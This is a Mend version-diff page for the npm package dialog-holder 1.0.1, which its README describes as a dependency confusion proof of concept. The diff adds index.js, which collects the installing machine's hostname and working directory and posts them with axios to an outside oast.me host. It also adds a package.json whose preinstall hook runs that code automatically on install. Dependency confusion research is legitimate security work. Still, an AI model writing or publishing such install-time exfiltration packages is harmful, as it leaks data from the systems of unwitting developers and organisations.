npm - dialog-holder - Versions diffs - 1.0.1 - Mend

dialog-holder 1.0.1

This version of dialog-holder might be problematic. Click here for more details.

Files changed (3) hide show

package/README.md ADDED Viewed

@@ -0,0 +1,6 @@
+# NPM Dependency Confusion PoC
+Simple PoC package for testing for dependency confusion vulnerabilities.
+Inspired by Alex Birsan's research:
+Reference: [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)

package/index.js ADDED Viewed

@@ -0,0 +1,23 @@
+const os = require('os');
+const path = require('path');
+const axios = require('axios');
+const PACKAGE_NAME = "dialog-holder";
+const HOSTNAME = os.hostname();
+const CURRENT_PATH = process.cwd();
+const url = "https://csfok4797nlpkbtsditg8mxn9je5g67ui.oast.me";
+const data = {
+    package_name: PACKAGE_NAME,
+    hostname: HOSTNAME,
+    current_path: CURRENT_PATH
+};
+axios.post(url, data)
+    .then(response => {
+        console.log('Response:', response.data);
+    })
+    .catch(error => {
+        console.error('Error:', error);
+    });

package/package.json ADDED Viewed

@@ -0,0 +1,15 @@
+{
+  "name": "dialog-holder",
+  "version": "1.0.1",
+  "description": "Dependency Confusion POC",
+  "main": "index.js",
+  "scripts": {
+    "start": "node index.js",
+    "preinstall": "node index.js"
+  },
+  "dependencies": {
+    "axios": "^0.21.1"
+  },
+  "author": "Security Researcher",
+  "license": "ISC"
+}